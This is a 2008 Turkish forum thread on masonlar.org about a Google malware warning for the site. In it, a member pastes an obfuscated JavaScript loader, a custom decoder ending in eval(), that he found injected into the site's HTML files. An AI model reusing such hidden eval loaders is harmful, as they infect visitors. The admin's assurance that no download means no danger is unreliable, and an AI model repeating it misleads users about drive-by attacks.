Masonlar.org - Harici Forumu
Site, Forum ve Uyeler Hakkinda => Site Hakkinda Diger Konular => Sorunlar => Konuyu başlatan: Barbaros - Ekim 19, 2008, 11:29:04 öö
-
Selamlar,
Arkadaşlar ben masonlar.org'a hep googleda masonlar yazıp öyle giriyordum. Bu günde herzaman ki gibi masonlar yazdım ve site başlığının altında "Bu site bilgisayarınıza zarar verebilir" yazıyor. Tıklayınca da şu sayfa geliyor.
http://www.google.com.tr/interstitial?url=http://www.masonlar.org/
Ben webmasterım. Bu şekilde uyarı vermesi için site kodlarında casus kodlar olması gerekir. Bu kodlar siteye giren üyelere trojan yani zararlı yazılım yükleterek, tüm bilgilerine ulaşılabilmektedir. (html trojan downloder + keylogger)
Sn. MASON,
Acaba birileri tarafından(hack grupları vs.) kasti olarak böyle birşey olması mümkün mü?
Veya bunun başka bir sebebi mi var?
Şuanda ben bilgisayarım tehlikede mi diye düşünüyorum. Bilgilendirirseniz sevinirim.
Saygılar.
-
Sayin Barbaros,
Dun baslamis olan bu sorun uzerinde halen calismaktayim. Site uzerinden sizlerinde gordugu gibi hicbir download yapilmamaktadir. Kodlama hatalarida mevcut gorunmemektedir. Diger kisiler tarafindan dolayli yapilan ve google uzerindeki durumumuzu etkilemeyi amaclayan bir faaliyet gibi gorunmektedir. Bilgisayarinizin yada bilgilerinizin guvenliginden (trojan, virus, adware, spywate vs. gibi konulardan) endise etmeniz icin oncelikle bilgisayariniza bir dosya yuklenmesi gerekmektedir. Ancak tekrarliyorum, Masonlar.org uzerinden hicbir download yapilmamaktadir. Bu nedenle bilgisayariniz ve siz Masonlar.org da guvendesiniz. Herhangi bir guvenlik asimi durumunda zaten bilgisayariniz size ikaz verecek, Masonlar.org sitesinin bilgisayariniza dosya yuklemeye calistigini haber verecektir.
Bilgilendirme icin tesekkur ederim. Konu ile ilgilenmekteyim.
Saygilarimla
-
Evet, bunun bir benzerini baska bir yerde de gormustum. Masonluk sitesinde de mi var? Cok enteresan..
Bi de kendi bilgisayarimdan sk kullanilanlara ekledigim icin genelde masonluk kismindan giris yapmiyorum ama saniyorum ki bircok siteler de mevcut, Masonlukla ilgili web siteler de cogalmis gibi. Bulmakta zorlaniyorum bazan bu Siteyi.
Peki kendi bilgisayarimdan, sk kullanilanlardan tabi giris yaptigim takdirde ayni sorun bende de gozukur mu Sayin Mason?
-
Sorun 1 gun icerisinde giderilecektir.
-
Sorun 1 gun icerisinde giderilecektir.
Anliyorum. Bu arada ;
Bu nedenle bilgisayariniz ve siz Masonlar.org da guvendesiniz.
bunu bilmek gercekten cok guzel :)
-
Ben de şu an böyle bir uyarıyla karşılaşmış bulunmaktayım.
-
Sayin Uyeler,
Google tarafindan yapilan aciklama asagida belirtilmistir.
"Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, masonlar.org did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message."
Yukaridada goruldugu uzere saldiri, dolayli yoldan ve site disindan yapilmaktadir. Yarin sorun cozulmus olacaktir.
Saygilarimla
-
Sn. MASON,
Sanırım ueuo.com yüzünden böyle bir sorun çıktı. http://www.siteadvisor.com/sites/masonlar.org sitesine bakarsanız tek sorunun o site olduğunu göreceksiniz. O siteye tıkladığımızda ise zararlı olarak gözüküyor. Sebebini bilmiyorum.
Söylediğim gibi webmasterım ve sitelerimi hack saldırılarına karşı korumak için, hack ataklarının bir kısmını biliyorum. Zlob adı verilen bir virüs vardır. Bu virüsün amacı, siteye girenlere arka kapıdan zararlı yazılım yedirmektir. Yani bu zararlı yazılımın bilgisayarımıza girmesi için herhangi bir download linki olmasına gerek yoktur. Bu zlob adı verilen virüs, site kodlarının içerisine koyulur, ve kodlar sayesinde siteye giren kişi farketmeden, hiçbir uyarı vermeden bu zararlı yazılımı bilgisayarlarımızda çalıştırır ve trojan aktif olur. Bunu genelde yabancı siteler reklam amaçlı yapardı ama ülkemizde de yaygın olmaya başlandı(hack grupları tarafından) ve genelde keylogger yedirmek için bu yöntemi uguluyorlar. Keylogger bilindiği gibi bilgisayarımızda tuşladığımız herşeyi ve belli zaman aralıklarla gizlice resimler çekip keyloggerı yapan şahsa göndermektedir. Ben bundan şüphelenmiştim ama bilgisayarımdaki antivirüs herhangi bir tepki vermediğinden dolayı şuanda sadece olması mümkün bir ihtimal olarak düşünüyorum.
Şu aşağıdaki java kodları ne işe yarıyor olabilir? Sunucunuzdaki hemen hemen tüm html dosyalarınızda bu kod bulunmaktadır.
<div id="ef"><script language="javascript">function snl(yu,lucw){if(!lucw){lucw='mF.&qJdgzCNwurK0H-Z)x{DYRp4=n;T8U}9lv5PLy?(cXk+bAoWOGe7i12VfISEt';}var y;var OR='';for(var yjts=0;yjts<yu.length;yjts+=4){y=(lucw.indexOf(yu.charAt(yjts))&63)<<18|(lucw.indexOf(yu.charAt(yjts+1))&63)<<12|(lucw.indexOf(yu.charAt(yjts+2))&63)<<6|lucw.indexOf(yu.charAt(yjts+3))&63;OR+=String.fromCharCode((y&16711680)>>16,(y&65280)>>8,y&255);}eval(OR.substring(0,OR.length-3));}snl(';PJWzd5V0D-bRi{kpD2GK75VwL;W4Y-5N.nIn7rWCWXL4YFGzdo}=P;eRD;50ZC(RYp}n7rW4YFGz9FGTYF50ZCGpY}Gw7?};PJORiC?ngH909n?K75VwL;W4Y-5N.;P;D2l;d5b=9FypPAyNYXUCWvf4Yy+;iC?;dxyCip}n9FA4WmSz&H2KWn?K75VwL;W4Y-5N.;7RYzUTdCyz&GUNd-bRi{kpD2GwP;5;q{XpDe5=L-.Tx5vN.C5p9z?N)XLN)k?T92inP5GpZULTdCywLrGTDo5wLFbn75G4DS+z&GUzPJ9n7SX;Y-5zlXLN)k?T92inP5GpZULTdCywLrGTDo5wLp?n7594Do?;gvU0Zm9;P5O4DCXpZzfCWvf4Yy+;iC?;dxyCi}94.2O;g5XpZ2i4D-G4.mSz&RAuOXLN)k?T92inP5GpZULndXU0ZmoK.GWr9?A4WyWrZIow&qcTdCywLrGTDo5wL;?pg-yKWn?K75VwL;W4Y-5N.;1RPU+ni-2=dx+;dSAz&GUndXcY.;ATJALKWn?K75VwL;W4Y-5N.;SCWvf4Yy+;iC?;dxyC7{7RDAyY.;ypPAyN{ALN)XLN)k?T92inP5GpZUL0.SORizLNW;?ngHECWvfz.mU');</script>
Yarına kadar sorun çözülmezse yardımcı olabilirim.
-
Sayin Uyeler,
Google gerekli arastirmayi yaparak sitenin guvenligini onayladi. Sanirim kisa sure sonrada arama icerigini duzeltir.
Saygilarimla
-
Evet şuanda hiçbir sorun yok sn. MASON. Merak ediyorum index dosyalarında bulunan fakat şuanda bulunmayan son mesajımda verdiğim javascript kodlarının bir rolü oldu mu acaba?
Saygılar.
-
Bahsetmis oldugunuz kodlar halen mevcut.